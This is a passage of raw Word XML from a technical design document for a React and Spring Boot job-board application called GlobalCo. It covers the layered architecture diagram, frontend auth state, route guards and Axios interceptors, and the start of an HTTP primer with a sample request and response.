                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>|  React 18 SPA (Vite 7) | Tailwind CSS (Red &amp; White Design System) | Lucide React Icons  |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>|  AuthContext (Token Sync) | Axios Client (Request/Response Interceptors)                |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+--------------------------------------------+--------------------------------------------+</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">                                             | HTTPS / JSON (Bearer JWT Authorization)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">                                             v</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+-----------------------------------------------------------------------------------------+</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>|                         SPRING SECURITY FILTER CHAIN (GATEWAY)                          |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>|  CorsFilter -&gt; JwtAuthenticationFilter (OncePerRequestFilter) -&gt; SecurityContextHolder   |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+--------------------------------------------+--------------------------------------------+</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">                                             | Authenticated Principal (User + Roles)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">                                             v</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+-----------------------------------------------------------------------------------------+</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>|                         REST CONTROLLER LAYER (PRESENTATION)                            |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>|  AuthController | JobController | ApplicationController | RecruiterController | ...      |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+--------------------------------------------+--------------------------------------------+</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">                                             | DTOs (Validated with @Valid, @NotNull)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">                                             v</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+-----------------------------------------------------------------------------------------+</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>|                         SERVICE LAYER (BUSINESS LOGIC)                                  |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>|  @Service @Transactional: JobService | ApplicationService | CandidateProfileService ...  |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+--------------------------------------------+--------------------------------------------+</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">                                             | JPA Entities (Managed Persistence Context)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">                                             v</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+-----------------------------------------------------------------------------------------+</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>|                         DATA ACCESS TIER (PERSISTENCE)                                  |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>|  Spring Data JPA Repositories | Hibernate 6 ORM | HikariCP Connection Pool              |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+--------------------------------------------+--------------------------------------------+</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">                                             | SQL (Parameterized DML / DDL)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">                                             v</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+-----------------------------------------------------------------------------------------+</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>|                         RELATIONAL STORAGE ENGINE                                       |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>|  H2 In-Memory DB (jdbc:h2:mem:jobboard_db) / MySQL 8.0 Enterprise Cluster              |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+-----------------------------------------------------------------------------------------+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>10. Frontend Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>The client application is organized into three architectural layers: Routing &amp; Guards, Global State Context, and Resilient HTTP Services:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>10.1 Global State Management (AuthContext.jsx)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">State Synchronization: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Rather than over-engineering with external state libraries like Redux or MobX, GlobalCo uses React's native Context API (`AuthContext.jsx`). The context encapsulates the authenticated user object, the JWT token string, and user roles. Upon successful login, the token and user metadata are synchronized to browser `localStorage`, ensuring session continuity across page refreshes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>10.2 Role-Based Route Guards (RequireAuth.jsx)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Declarative Route Protection: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Protected pages are shielded using a declarative higher-order component (`RequireAuth.jsx`). If an unauthenticated user attempts to access `/candidate/dashboard`, they are redirected to `/login`. If a Candidate attempts to navigate to `/admin/dashboard`, the guard evaluates `user.role === 'ROLE_ADMIN'`. Failing the role check results in an automatic redirect to `/unauthorized` or their role-appropriate cockpit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>10.3 Resilient Axios Interceptors (api.js)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP Interception Pipeline: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>All outgoing network requests pass through a centralized Axios client configured in `src/services/api.js`:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Request Interceptor: Automatically inspects localStorage for 'token'. If present, it injects 'Authorization: Bearer &lt;jwt&gt;' into the HTTP request headers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Response Interceptor: Monitors incoming HTTP responses. If a 401 Unauthorized is detected (indicating token expiry or signature tampering), it automatically clears localStorage, resets AuthContext state, and triggers a clean redirect to /login.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Foundations Primer: Core Software Engineering &amp; Web Architecture (Zero-to-Hero)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Before dissecting the specific codebase of GlobalCo, this section establishes the foundational computer science, networking, backend, frontend, database, and cryptographic principles underpinning the entire application. If you are reviewing this project with zero prior software engineering experience, study this primer first.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1. Client-Server Architecture &amp; HTTP Networking Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Core Concept: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Every modern web application is built upon the Client-Server model. A client (the user's web browser, e.g., Chrome) and a server (the remote machine running the application logic) communicate over a network using the Hypertext Transfer Protocol (HTTP/HTTPS).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>The Client (Presentation Tier): Executes on the end user's machine. Its job is rendering graphical UI components (buttons, tables, forms), handling user gestures (clicks, keystrokes), and dispatching network requests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>The Server (Application Tier): Executes in a controlled cloud or data center environment. Its job is enforcing security, processing business rules, orchestrating database transactions, and returning structured data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Statelessness: Under HTTP, each request sent from the client to the server is completely independent. The server does not automatically 'remember' who sent a previous request unless credentials (such as a session cookie or JWT token) are explicitly attached.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1.1 The Anatomy of an HTTP Request &amp; Response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Every network communication between the React frontend and Spring Boot backend adheres to this strict physical structure:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing: Raw HTTP Request &amp; Response Anatomy in GlobalCo</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9648"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9648"/>
            <w:shd w:fill="F1F5F9"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>[CLIENT REQUEST ANATOMY]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>POST /api/jobs/101/apply HTTP/1.1                &lt;-- Request Line (Verb, Path, Protocol)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Host: localhost:8080                              &lt;-- Target Server Host</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Authorization: Bearer eyJhbGciOiJIUzI1NiIsIn...   &lt;-- Security Token (Identity &amp; Role)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Content-Type: application/json                    &lt;-- Payload Data Format</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Accept: application/json                          &lt;-- Desired Response Format</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                                                 &lt;-- Request Body (Payload)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "coverLetter": "I have 5 years Java experience."</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>}</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[SERVER RESPONSE ANATOMY]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HTTP/1.1 201 Created                              &lt;-- Status Line (Protocol, Status Code)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Content-Type: application/json                    &lt;-- Returned Data Format</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Date: Wed, 16 Sep 2026 14:00:00 GMT              &lt;-- Timestamp</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                                                 &lt;-- Response Body (JSON Entity)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "id": 45,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "jobId": 101,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "status": "APPLIED",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "appliedAt": "2026-09-16T14:00:00"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1.2 HTTP Verbs &amp; Standard Status Codes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1440"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
